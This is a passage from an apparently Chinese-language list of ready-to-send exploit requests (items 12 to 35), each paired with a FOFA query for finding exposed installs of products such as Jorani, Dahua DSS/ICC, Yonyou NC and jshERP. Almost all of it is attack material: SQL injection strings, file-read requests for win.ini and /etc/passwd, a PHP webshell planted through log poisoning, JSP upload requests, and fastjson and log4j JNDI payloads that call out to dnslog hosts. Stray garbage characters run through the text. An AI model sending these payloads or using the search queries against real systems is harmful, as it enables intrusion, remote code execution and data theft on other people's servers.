" X7 q" M" L) s/ d+ oFOFA:icon_hash="953405444" || app="Landray-EIS智慧协同平台"& m3 H4 d# |& b$ A" K
GET /dossier/doc_fileedit_word.aspx?recordid=1'%20and%201=@@version--+&edittype=1,1 HTTP/1.1( K- S! P! t" d. k4 l) K0 i
Host: 127.0.0.1
3 T* K$ d; m6 F! N( u- xPragma: no-cache+ r' o |( \& o. f5 X! n
Cache-Control: no-cache; K& q& U( y x) J& N W
Upgrade-Insecure-Requests: 1+ u% U* c) ^3 {3 j R
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
5 j S: T q3 E; j' \5 TAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.77 c' u' J8 t9 k
Accept-Encoding: gzip, deflate: j) M" H. j& m
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8$ y; X$ c! Z! q# w4 p
Connection: close1 q5 u& [: `$ Q5 w" ^5 t
% Q* |9 n3 A- m$ ~/ R4 N' S" i' J: h' L. V% _. w5 I, o
12. Jorani < 1.0.2 远程命令执行/ v! y, e% f' t& Z
FOFA:title="Jorani") I8 }5 n1 ?% L/ X8 R
第一步先拿到cookie
7 B' P3 P7 |& wGET /session/login HTTP/1.1
9 I, {3 c& [* KHost: 192.168.190.30$ }. a/ x; a/ D
User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36
6 ~. h! u9 Y+ Q7 qConnection: close
. j% m, j. Q# mAccept-Encoding: gzip
2 W$ w8 z3 w8 H2 q3 J; n+ N: v. R% Q$ Q( H- U& h. J! [
2 X9 v0 `( r% m3 |3 V6 j+ C响应中csrf_cookie_jorani用于后续请求6 `7 [6 r" U% A5 W0 M! t
HTTP/1.1 200 OK5 f' U: Z' G, W- S2 f8 _
Connection: close, I( \+ o& n* @( {
Cache-Control: no-store, no-cache, must-revalidate
" j* i3 ^. A& s- S8 I8 }* iContent-Type: text/html; charset=UTF-8
: }% t n, X) X( rDate: Tue, 24 Oct 2023 09:34:28 GMT' i8 M+ G% D$ g% D* u/ @& R
Expires: Thu, 19 Nov 1981 08:52:00 GMT5 g& j3 w. E- I& ?
Last-Modified: Tue, 24 Oct 2023 09:34:28 GMT
' d+ y& R, d8 L0 a0 aPragma: no-cache2 O6 v+ _4 C2 I
Server: Apache/2.4.54 (Debian)( s# c# r- t3 |, r; P! D
Set-Cookie: csrf_cookie_jorani=6ca560f2b0baf3cda87c818a4a15dc77; expires=Tue, 24-Oct-2023 11:34:28 GMT; Max-Age=7200; path=// e1 P4 ?% M8 [( k8 k
Set-Cookie: jorani_session=bqk0ttr6q2mg3tae6rd75ei02umkq99r; expires=Tue, 24-Oct-2023 11:34:28 GMT; Max-Age=7200; path=/; HttpOnly
5 s3 x0 w/ @4 G) G a ~, UVary: Accept-Encoding2 w+ S! {% H$ M# k9 P V. x8 W, O
4 P5 {) z( r8 d9 M! g
! Q: V: o9 j& P2 z6 r D! r" m% OPOST请求,执行函数并进行base64编码' P2 ~% y! S- G% s( C
POST /session/login HTTP/1.1
4 s3 ?* \3 {* L( I! ` B+ XHost: 192.168.190.30& b( y, }, j j
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.362 F0 C+ r3 Y1 u0 Q9 h
Connection: close+ ?4 V9 R. |( _
Content-Length: 252
9 T6 E" v% `! k: QContent-Type: application/x-www-form-urlencoded
/ ^$ t5 Z; n+ R& P* ~8 d9 E% O9 u: PCookie: csrf_cookie_jorani=6ca560f2b0baf3cda87c818a4a15dc77; jorani_session=bqk0ttr6q2mg3tae6rd75ei02umkq99r; ^. O/ O* J2 W/ [6 z3 ^% c
Accept-Encoding: gzip
/ e. n6 J1 y. H# k
9 r* z, ?% D0 }- ucsrf_test_jorani=6ca560f2b0baf3cda87c818a4a15dc77&last_page=session%2Flogin&language=..%2F..%2Fapplication%2Flogs&login=<?php if(isset($_SERVER['HTTP_K1SYJPMHLU4Z'])){system(base64_decode($_SERVER['HTTP_K1SYJPMHLU4Z']));} ?>&CipheredValue=DummyPasswor0 j( U6 Y" f/ K9 U
/ ~& N, h+ `( ]5 J6 A) M2 N7 Y
& A9 a2 p* z, a! c. m
: \ b& w" t! _) b向靶场发送如下请求,执行id命令,请求头中的ZWNobyAtLS0tLS0tLS07aWQgMj4mMTtlY2hvIC0tLS0tLS0tLTs=是命令base64编码后的字符串
2 [* j- ~1 ~$ [- e4 m+ @ p* wGET /pages/view/log-2023-10-24 HTTP/1.15 ~7 e# I5 L- t f6 c" d' P
Host: 192.168.190.30. x8 T( L$ f6 A7 s9 y
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36! v2 t1 K( Q3 I6 K( F- i S- J0 g
Connection: close" v+ u: u4 e( j" z" i
Cookie: csrf_cookie_jorani=6ca560f2b0baf3cda87c818a4a15dc77; jorani_session=bqk0ttr6q2mg3tae6rd75ei02umkq99r# s8 L9 e/ [- c1 t. R& W" d
K1SYJPMHLU4Z: ZWNobyAtLS0tLS0tLS07aWQgMj4mMTtlY2hvIC0tLS0tLS0tLTs=/ u o; m. ~# m* B5 X
X-REQUESTED-WITH: XMLHttpRequest5 C& _, B4 `; y0 Z
Accept-Encoding: gzip
3 D% A# \$ C4 L( ~$ B) v; |. }: C/ I0 \ _/ M& M6 ?# f) [
5 ^" w$ \# G8 m4 s, h6 ]( _% ^6 n13. 红帆iOffice ioFileDown任意文件读取
, G9 r! n W: e* m- tFOFA:app="红帆-ioffice"7 S9 Z( z! z9 D0 \1 ` X" n" L' V3 Y
GET /ioffice/prg/interface/ioFileDown.aspx?sFilePath=c:/windows/win.ini HTTP/1.1! {/ l3 y5 h$ z! L
Host: x.x.x.x
1 o. K" R k" k+ B1 n0 }% XUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36
' N+ {7 g9 W- ?! s! fConnection: close
6 \; E) F6 u- Z- [( m+ U6 _Accept: */* M4 u0 H7 L$ E Z: c- t
Accept-Encoding: gzip
) n$ d1 G/ `2 `
5 ]4 ]; f3 c/ Z0 k0 I$ [: q
, ^. F1 `4 r6 L7 A- u B1 a! V14. 华夏ERP(jshERP)敏感信息泄露
( y4 x& H6 W; t" bFOFA:body="jshERP-boot"
1 ^) @# o# [4 }% p泄露内容包括用户名密码% S( h( W( `$ r
GET /jshERP-boot/user/getAllList;.ico HTTP/1.1
^3 d; W3 G: i4 Y9 }: QHost: x.x.x.x+ }: E( e# P7 h, H% n& s
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36# t" J3 `! _" b# [+ N2 e
Connection: close
& f' v7 q# k( tAccept: */*
) l. d2 e$ C! b( l6 @/ gAccept-Language: en
' X. Z a4 ^5 j5 M, G9 _, C" ^Accept-Encoding: gzip
( d5 ]4 b7 ]3 F4 j
7 x6 L: ^! k" t, @) M3 l' X& c$ p3 K
15. 华夏ERP getAllList信息泄露
) E2 ]' t' }4 l$ h# zCVE-2024-04900 `" q5 @7 D- r; o+ M
FOFA:body="jshERP-boot" X6 W* z( h* G* l* l
泄露内容包括用户名密码 E8 @# `# @5 E$ ?. l
GET /jshERP-boot/user/a.ico/../getAllList HTTP/1.1
( I) L q; X7 {Host: 192.168.40.130:1005 y4 J6 c l3 H+ {8 z( }+ x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36* [: d% O0 Q! D6 Q& A+ K7 T
Connection: close
2 W6 c; N7 z$ Y# VAccept: application/signed-exchange;v=b3;q=0.7,*/*;q=0.8
( v- f; ~1 e- W5 EAccept-Language: en+ l& i8 H4 U+ Y# ^4 g( S5 _) z6 q, U7 k
sec-ch-ua-platform: Windows' d7 M5 Y# U7 N8 P4 p
Accept-Encoding: gzip/ I$ C/ n! Y8 R& P+ E& g
8 a) G0 v2 v; b
$ G8 N3 _: o/ ?7 t: ~; N6 j
16. 红帆HFOffice医微云SQL注入4 b% v- r' f4 V m$ w+ e9 r$ a! u
FOFA:title="HFOffice"
. ^8 C. j% m. {& e6 W" R4 h. l+ Ypoc中调用函数计算1234的md5值7 R! d' u& f# Z- F5 w% ]
GET /api/switch-value/list?sorts=%5B%7B%22Field%22:%221-CONVERT(VARCHAR(32),%20HASHBYTES(%27MD5%27,%20%271234%27),%202);%22%7D%5D&conditions=%5B%5D&_ZQA_ID=4dc296c6c69905a7 HTTP/1.1
# @. P/ U* u, y! ]3 s! e( r7 nHost: x.x.x.x
8 [4 E- H1 |9 BUser-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36# u( C m) ?5 |$ i$ L
Connection: close
+ a; Q- w# L q' G) BAccept: */*+ S2 G) O9 h4 l, P
Accept-Language: en# r4 M4 T& W: w( }& q
Accept-Encoding: gzip& i: z/ ~9 e1 [# }9 L. w1 j
8 j7 u, O9 C$ Q
6 g) m! K& O* L1 n+ M' K17. 大华 DSS itcBulletin SQL 注入/ M# T& t( M" @' C: r
FOFA:app="dahua-DSS"
& _0 |& F2 C% [POST /portal/services/itcBulletin?wsdl HTTP/1.1
$ i/ e$ a5 b* DHost: x.x.x.x
8 H W8 w5 X' @4 ^5 ]# KUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15: I# j+ a* B% V0 z5 L
Connection: close
; Y% ?# w# q2 l8 jContent-Length: 345
5 }+ C$ F0 I# X$ L7 {2 }Accept-Encoding: gzip
' @5 d3 g& V: l) w
5 K, }4 A( H/ [* j6 P! T6 c<s11:Envelope xmlns:s11='http://schemas.xmlsoap.org/soap/envelope/'>9 q } k+ b+ _ m* O: S7 x
<s11:Body>
1 k( z s/ s* I# o9 U7 U- y <ns1:deleteBulletin xmlns:ns1='http://itcbulletinservice.webservice.dssc.dahua.com'>) k% f: R6 L9 W4 y( x; |0 }
<netMarkings>+ }. b3 x: t1 M L$ G1 N0 M6 J
(updatexml(1,concat(0x7e,md5(102103122),0x7e),1))) and (1=1
* Q( ]: j, {. c4 `) ~' W$ I$ K3 ] </netMarkings>
1 w! j7 }9 I( C </ns1:deleteBulletin>% Z5 r+ e* H3 K6 ?
</s11:Body># L: R8 g& K' j% ?) f; x
</s11:Envelope>
6 F0 i$ |* o: _- _3 z
1 m# e9 d( ]0 K# F6 j d$ p/ Y% I3 z$ ^: `( v
18. 大华 DSS 数字监控系统 user_edit.action 信息泄露
0 u; d1 [& X) p/ e$ P/ L8 Y `5 JFOFA:app="dahua-DSS"
$ B/ y# H: Z& G" S2 E* ]6 CGET /admin/cascade_/user_edit.action?id=1 HTTP/1.14 ~0 H) p5 N1 D) r2 M
Host: your-ip" a- b- G; r# ~4 B& J
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36# t0 ?6 B! n+ U% `1 J9 C
Accept-Encoding: gzip, deflate# ?) j( B, X( r
Accept: */*
/ F4 f' {& i+ d) Y: S& wConnection: keep-alive7 B- d- c8 ?, A' j/ X9 g
* Y1 S, r3 ~+ ]. n1 A; e
. U1 S1 p* y, z2 }9 W5 h* x8 R5 I; O4 @
19. 大华 DSS 数字监控系统 attachment_clearTempFile.action SQL注入
0 B _% ?( U/ O3 u& [- ]FOFA:app="dahua-DSS"
* l% y8 z {: k% pGET /portal/attachment_clearTempFile.action?bean.RecId=1%27)%20AND%20EXTRACTVALUE(8841,CONCAT(0x7e,user(),0x7e))%20AND%20(%27mYhO%27=%27mYhO&bean.TabName=1 HTTP/1.1
5 Y# _/ S5 |" i) b9 r) ^' _3 CHost:
0 N, v5 {( Z6 S1 m+ I, E: vUser-Agent:Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36
) h$ [! l. e ]# V2 O# k0 D3 }Accept-Encoding: gzip, deflate
2 S' [/ E, J, }Accept: */*
. C3 W7 m9 a' vConnection: keep-alive
# p: J t3 e$ @4 F0 C6 k* s7 n: ]2 E
8 R! r9 k$ O# a( M, ]2 F- N20. 大华ICC智能物联综合管理平台任意文件读取
* z9 A2 B2 H- qFOFA:body="*客户端会小于800*"
5 y. i: N# s+ K& ?/ q* e0 GGET /evo-apigw/evo-cirs/file/readPic?fileUrl=file:/etc/passwd HTTP/1.1
) w: G) U: A& Y- T' uHost: x.x.x.x
. O7 V# d+ q0 q! v, _$ ?User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
8 V0 G' @* C& s( H3 g1 TConnection: close
* k# Y- f- R) `' Q! h4 vAccept: */*, }8 k6 }% Q) B$ G3 P: z$ w0 }$ R
Accept-Language: en8 }7 d/ z5 U) `
Accept-Encoding: gzip
/ |; y' }" D# v% ]3 t& F0 G* g) G; e% G0 J t9 n" `& J8 R
3 r$ t. ^3 X/ ~' y21. 大华ICC智能物联综合管理平台random远程代码执行
- L: T; w, b1 k5 bFOFA:icon_hash="-1935899595"
) U+ W0 g0 N: W5 l4 ^- pPOST /evo-runs/v1.0/auths/sysusers/random HTTP/1.1
. ~1 S m: X* Q5 z. r2 ?% gHost: x.x.x.x
, B3 P( a% Y+ gUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
! a' C7 @. l# X/ d( y3 l9 lContent-Length: 1617 o) N8 g5 R* g) e' w
Accept-Encoding: gzip
; }! @/ R5 V, P3 OConnection: close* b: [5 k4 `+ N9 }: W* C
Content-Type: application/json;charset=utf-8. _; @8 d0 E% q. l
3 A& u; }3 `+ |$ D6 {, q2 o
{
! H7 e9 |2 M7 a"a":{7 M! @, O- }2 D7 _& {2 l
"@type":"com.alibaba.fastjson.JSONObject",1 U% u4 a3 i' m/ i+ A* m$ h5 j
{"@type":"java.net.URL","val":"http://farr9frh.dnslog.pw"}- J' a% i9 Q J
}""2 `% T( i0 _% k& K
}
% Z# w# E+ g9 [* J t
8 | X+ a& C# ]" W8 e8 x! g/ s. q5 h: }, N* b& b7 T
22. 大华ICC智能物联综合管理平台 log4j远程代码执行2 O& T' u* d' H" c( P
FOFA:icon_hash="-1935899595". l7 x: S0 [# G
POST /evo-apigw/evo-brm/1.2.0/user/is-exist HTTP/1.1/ b% t+ l$ {, Y" i
Host: your-ip
7 K. q6 S8 [) W, pUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36$ i1 E: B' @' ] S3 S% g. L0 v
Content-Type: application/json;charset=utf-8
4 x6 [1 Y* M2 E) v% V+ W, {8 X# c5 `7 P- P6 i5 z
{
8 F& q9 d* m+ s' o/ B1 D"loginName":"${jndi:ldap://dnslog}"/ h: k! x3 }! F+ k: E1 Q" ^9 F
}
$ I. X& B3 J/ h- j* I
% b1 g4 Y; `5 A- Y5 ~: z1 A2 J5 W" U1 W/ _! j% E7 h) R: Y; W
) u1 P( U. y) C+ f& o/ S9 F, ]23. 大华ICC智能物联综合管理平台 fastjson远程代码执行
" s, R5 V$ U2 hFOFA:icon_hash="-1935899595"5 }% X/ a# N# q6 T A
POST /evo-runs/v1.0/auths/sysusers/random HTTP/1.18 Q+ V& q4 U. u! m6 h
Host: your-ip
& d% d( e9 B1 Y6 vUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
M2 m# X$ T- f1 t" ]$ s |Content-Type: application/json;charset=utf-8' d3 }+ S: e! K( v& v* {7 N
Accept-Encoding: gzip
) D: g1 D* E/ LConnection: close0 ~9 e3 t7 l- ~/ _- B5 Z
- a" f7 D2 I/ t: X% b/ ^
{
" Y3 U3 q% F) X( s4 w "a":{
6 p8 V6 K4 x( }9 M( b; v' _ "@type":"com.alibaba.fastjson.JSONObject",
# o, r# G5 M: A% h {"@type":"java.net.URL","val":"http://DNSLOG"}
0 U5 T9 I6 a) m% O h }""
1 ? ?8 d% J9 L9 `# d2 X. d}* y9 Z5 G# t7 z' v* w
; i' z F! S9 F
% T1 @% I4 S# ]7 D/ p% m24. 用友NC 6.5 accept.jsp任意文件上传
3 N l, J9 v& ?3 J/ x2 Z; U! B3 ~FOFA:icon_hash="1085941792"$ s+ ?8 I: u3 k3 |$ k
POST /aim/equipmap/accept.jsp HTTP/1.1
! p( h1 d0 o% CHost: x.x.x.x+ P( K! B. j! U4 t
User-Agent: Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36
/ w$ C I g! J J& b; Y% VConnection: close
" `, c5 g; _4 |( ]Content-Length: 4495 h- v7 P- ^8 s8 _0 X" R8 w1 g# v
Accept: */* E; T7 k; s2 t ]
Accept-Encoding: gzip. k* O, h' N# Z. |
Content-Type: multipart/form-data; boundary=---------------------------yFeOihSQU1QYLu0KwhX72U5C1sMYc9 ]! |! D# F% T$ M" x, Y% a: v
1 M# F: n3 N' k' D$ [: j
-----------------------------yFeOihSQU1QYLu0KwhX72U5C1sMYc0 l5 b. A& E$ E3 O$ W& Y. M
Content-Disposition: form-data; name="upload"; filename="2XpU7VbkFeTFZZLbSMlVZwJyOxz.txt"
- i3 c1 x+ p8 R4 {' M% kContent-Type: text/plain* k8 ~4 |/ @( w) Z% A. F" H
6 |# ~3 Y0 f$ f. { ~) G b<% out.println("2XpU7Y2Els1K9wZvOlSmrgolNci"); %>0 e& J/ v# l4 u' \
-----------------------------yFeOihSQU1QYLu0KwhX72U5C1sMYc" R- j, Y1 P6 s
Content-Disposition: form-data; name="fname"
) c' W, {# t( w: T% u9 M# s
$ ]; ?! r" }. g5 N' m4 j\webapps\nc_web\2XpU7WZCxP3YJqVaC0EjlHM5oAt.jsp0 _/ {+ W' H" i# C' L; C
-----------------------------yFeOihSQU1QYLu0KwhX72U5C1sMYc--
5 H. z0 `. U Y7 C, G* e: Y$ x9 m
6 }- N; T! a" r0 u/ E# t. ^. E# P& p, S: q* I" ?
25. 用友NC registerServlet JNDI 远程代码执行 O8 X3 t- |% {, h# z. b1 V. K
FOFA:app="用友-UFIDA-NC"+ W m ^$ f; c6 d" I( l
POST /portal/registerServlet HTTP/1.1
6 k T$ x/ V3 bHost: your-ip' F" s* c/ U- \! R
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:71.0) Gecko/20100101 Firefox/71.0' I6 X* G9 L! v6 }
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*; q=0.8,application/signed-exchange;v=b3;q=0.9
1 e/ d# a4 T2 R9 L5 ?# Z( WAccept-Encoding: gzip, deflate- Q+ X9 J# l1 [2 q5 ]
Accept-Language: zh,en-US;q=0.9,en-GB;q=0.8,en;q=0.7,zh-CN;q=0.61 Z$ q- e# [ m
Content-Type: application/x-www-form-urlencoded
$ L, x7 }: A! [$ ]8 T: o
' P; }8 R( ^3 wtype=1&dsname=ldap://dnslog
& M* s- G- u# Z! a% D3 i
t+ ^5 F3 r! P- M3 J; g& z0 A
1 ?. i% T- o* R7 c/ [! N' x
O" S. r2 v4 r8 \26. 用友NC linkVoucher SQL注入
" r2 M9 n" V! Y" TFOFA:app="用友-UFIDA-NC"
! g4 B2 o- p7 E" r. S+ LGET /portal/pt/yercommon/linkVoucher?pageId=login&pkBill=1'waitfor+delay+'0:0:5'-- HTTP/1.10 f4 t" J. b4 [6 [8 Q
Host: your-ip
3 \, Z9 k6 `0 E6 R) u1 nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
2 m; f: ^ M' D2 y! B; {& N) JContent-Type: application/x-www-form-urlencoded. j) N: t+ Y3 M v3 @. u! x+ \
Accept-Encoding: gzip, deflate& V) C2 V' J0 w& P: D& m1 ~
Accept: */*
! P4 A4 b6 |9 C2 ~Connection: keep-alive! i( D2 x/ w) V5 M- R7 E' |: ~
' _- T0 i% y6 O$ r& p1 ]$ a. g1 N4 `$ E
' h, O- B w! Q& L) F27. 用友 NC showcontent SQL注入$ K/ Y: {9 b3 @$ q/ H( p o& f# N
FOFA:icon_hash="1085941792"2 i S! J7 ?; f- ~
GET /ebvp/infopub/showcontent?id=1'+AND+1=DBMS_PIPE.RECEIVE_MESSAGE(1,5)-- HTTP/1.1
( v9 l3 s3 [+ v: c2 sHost: your-ip
7 R- c0 `9 Z/ x& xUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
* ^1 Z1 m6 S+ ?; b: R( d. f) ZAccept-Encoding: identity7 `6 n5 U$ _, F* `& {
Connection: close
0 B: b) A7 S# d+ V7 OContent-Type: text/xml; charset=utf-8" z, l% }9 M( p4 x
5 O9 }. _) F7 `; K2 I
0 [1 Z" Y: e: a2 n- b28. 用友NC grouptemplet 任意文件上传
% g x' U' l7 w; |* s h) V+ zFOFA:icon_hash="1085941792"! ~2 O# D) N/ E# u- r" E) g) q
POST /uapim/upload/grouptemplet?groupid=nc&fileType=jsp HTTP/1.1
& L& j4 }- ~' ~, A# V6 `1 BHost: x.x.x.x3 J$ c2 z1 _( S) Q
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.362 ^/ {) @. Y9 b6 j8 L
Connection: close" r2 F. s" F( a' C/ w
Content-Length: 268: t! I1 @, W$ G; o
Content-type: multipart/form-data; boundary=----------ny4hGVLLpZPZm0CE3KNtyhNSXvFgk, D) n. }; p% q- G, |$ A( R9 r
Accept-Encoding: gzip
0 X; E& g7 `& ]+ j; s& M$ E* ]0 P- `2 F
------------ny4hGVLLpZPZm0CE3KNtyhNSXvFgk
- v! C5 N9 o- S" a' Q8 A6 O8 yContent-Disposition: form-data; name="upload"; filename="2fiu0YTGkaX2DrJlUZZP5IGvNvk.jsp"% ^3 L( t, t# d5 D N9 n
Content-Type: application/octet-stream. l' o" A i* E5 j5 y
! n$ h X8 ?1 U$ O. o( ^* X5 I# `
<%out.println("2fiu0WM4788fa6NcMHipkIthTTW");%>9 \4 I" n! ^* C, b
------------ny4hGVLLpZPZm0CE3KNtyhNSXvFgk--
+ l. y( {% |4 ] Z5 _9 `! ~9 e. ?0 \# t s( D1 k7 x
: P( X% g# c1 \; r
/uapim/static/pages/nc/head.jsp
$ p( J9 o7 Q9 K% f7 }2 M6 T( Y& ?# o1 Y0 O7 q
29. 用友NC down/bill SQL注入
0 c* }# r' I, d& \4 W! IFOFA:icon_hash="1085941792" && body="/logo/images/logo.gif"; A d5 M0 L7 i
GET /portal/pt/erfile/down/bill?pageId=login&id=1'+AND+4563=DBMS_PIPE.RECEIVE_MESSAGE(CHR(65),5)-- HTTP/1.1
v9 V1 w3 p2 D4 THost: your-ip
1 r- b/ g" w! Z+ ?. aUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.366 U- E$ [8 E. h; f* y6 z2 K7 R
Content-Type: application/x-www-form-urlencoded
( `0 y! `5 _- f* rAccept-Encoding: gzip, deflate h* c0 g! Y! o# C/ K* I2 a$ j( P
Accept: */*- y' \& L& B, G1 { n/ q0 c
Connection: keep-alive
% u8 t+ K/ |% t7 J* Z$ p$ N
( s: n6 G# k1 Y/ d7 B/ k' G# x; k# `" o5 V& u5 q
30. 用友NC importPml SQL注入! ^ O! u4 d2 }* l
FOFA:icon_hash="1085941792" && body="/logo/images/logo.gif"
5 e3 U+ l: I: } t SPOST /portal/pt/portalpage/importPml?pageId=login&billitem=1'WAITFOR+DELAY+'0:0:5'-- HTTP/1.1! f* Z: J, W8 }. V' {" ^- y
Host: your-ip! G8 e, h( B. g, V* l
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryH970hbttBhoCyj9V
' j) `3 U- e$ Z# R3 j6 YUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36
6 Q3 j! \& X2 xConnection: close
1 z, C: w( V4 }, ^/ i) P5 t7 b
, W, O6 Q8 V& Z4 D6 O9 {, S------WebKitFormBoundaryH970hbttBhoCyj9V; ]% l4 k# b5 \; F" d# ?
Content-Disposition: form-data; name="Filedata"; filename="1.jpg"
3 u, k- f# v- v: uContent-Type: image/jpeg# V" f r$ T8 d. Z$ g4 w2 n
------WebKitFormBoundaryH970hbttBhoCyj9V--2 u9 i! I1 B6 R, m2 X
, m8 h( L8 w. R9 v
, x/ @7 z, s6 r7 C! G1 @
31. 用友NC runStateServlet SQL注入
+ w: P9 ~! n3 }; o2 Gversion<=6.5& a& d L0 y: k) K* u
FOFA:icon_hash="1085941792" && body="/logo/images/logo.gif"+ n; Y5 h( l3 I7 }. e
GET /portal/pt/servlet/runStateServlet/doPost?pageId=login&proDefPk=1'waitfor+delay+'0:0:5'-- HTTP/1.1
1 R5 k& V5 z2 b' l. ?Host: host! @1 J$ C: q% e2 z3 l/ F4 B G& j
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
) |; p; A" @* CContent-Type: application/x-www-form-urlencoded3 g8 y) t1 H7 y5 Q! I4 d
- z' J2 h" k9 \1 }. e% {
8 W D6 h' A- _$ ~# o32. 用友NC complainbilldetail SQL注入
1 p& m' Y% X) O. M% aversion= NC633、NC65
& e9 N) p* \! f/ M1 y. h5 J# ZFOFA:app="用友-UFIDA-NC"
: W; M4 ?9 `2 q8 K1 ^GET /ebvp/advorappcoll/complainbilldetail?pageId=login&pk_complaint=1'waitfor+delay+'0:0:5'-- HTTP/1.1
. l' o8 v F" U" YHost: your-ip- @. R6 i' t5 p! P& U
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
- q% ?- Z- `3 A6 ]( ]# B% ^Content-Type: application/x-www-form-urlencoded* q8 U0 S1 S; U7 u
Accept-Encoding: gzip, deflate
' l; n% |2 f W' x; o6 VAccept: */*; w$ n' {! M" e S& H/ ^7 \/ q V
Connection: keep-alive9 r$ W" x9 N5 I$ X7 x
( C9 {: u: j- n1 \# {6 Y) z
9 K3 L7 a2 [8 q! X
33. 用友NC downTax/download SQL注入. T& y/ U2 c3 {4 b1 n3 C
version:NC6.5FOFA:app="用友-UFIDA-NC"
$ N o/ Y, G" yGET /portal/pt/downTax/download?pageId=login&classid=1'waitfor+delay+'0:0:5'-- HTTP/1.16 q! c# m2 m$ G- K* \
Host: your-ip- N" v; r, }+ L5 m/ O! |3 n
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36# O: W: X, _& E, z
Content-Type: application/x-www-form-urlencoded
$ L7 b9 O# ^0 f7 C; y8 I: l$ }$ e- i# r' XAccept-Encoding: gzip, deflate
& J6 K* v: X) |5 N" oAccept: */*
/ \3 y" ]! k# k, d; ?) z" MConnection: keep-alive
8 e9 w+ C/ a- F& f1 _$ F
+ C5 S; J- y& S( V& M
: A: l0 s, d+ ]2 c3 C34. 用友NC warningDetailInfo接口SQL注入9 Z& w0 C: Q$ {
FOFA:app="用友-UFIDA-NC"
; K* [; F! ~. z- x6 C3 ]5 EGET /ebvp/infopub/warningDetailInfo?pageId=login&pkMessage=1'waitfor+delay+'0:0:5'-- HTTP/1.1
% D4 P: M/ j! F/ v! THost: your-ip- l; }+ t6 O' T- o
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.362 w5 ?& V" D* Z/ s( ~' y, W h/ U
Content-Type: application/x-www-form-urlencoded
3 q% E- x- H0 r6 ?, e* H0 ~* L4 kAccept-Encoding: gzip, deflate
r- N" _5 D- {Accept: */*
( ?5 ^0 @* W$ qConnection: keep-alive
9 n- K0 W6 j7 }* j( A, K+ l- b
* s% D" O6 U( {. h8 ]% N* d
s4 _ J6 J: i* B$ \, d35. 用友NC-Cloud importhttpscer任意文件上传
6 H5 M3 Y9 c4 @FOFA:app="用友-NC-Cloud"5 x6 w! P* S. ?
POST /nccloud/mob/pfxx/manualload/importhttpscer HTTP/1.1
2 O; Z* V/ W/ u: \9 eHost: 203.25.218.166:8888
5 E2 A, I4 ]8 [$ Y( vUser-Agent: Mozilla/5.0 (Windows NT 5.1; rv:5.0) Gecko/20100101 Firefox/5.0 info
